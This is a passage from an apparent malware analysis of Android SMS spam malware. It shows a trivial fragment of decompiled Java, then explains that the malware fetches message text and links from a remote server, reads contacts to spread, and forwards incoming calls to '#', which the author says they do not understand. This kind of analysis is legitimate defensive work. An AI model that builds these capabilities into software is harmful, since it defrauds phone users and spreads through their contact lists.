    catch (ParserConfigurationException localParserConfigurationException)
    {
      localParserConfigurationException.printStackTrace();
    }
  }
}).start();
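The SMS text comes from the remote server, so the content of the messages being sent can be changed quickly, and the link being sent can also be changed to suit the situation.
In addition, it monitors your incoming calls: when a call comes in, it forwards the call to #. This is the part I don't quite understand. I'm not sure what forwarding the number to # does. Does it pick up and hang up the call? Or is it related to the USSD vulnerability?
-----
That is roughly what the virus code looks like. Although the virus still has to be installed and run before it has any effect, ordinary users will probably find it hard to notice that the app is fraudulent. Because the virus can directly access contact data once a phone is infected, it spreads very fast, and how rampant these viruses are is really frightening.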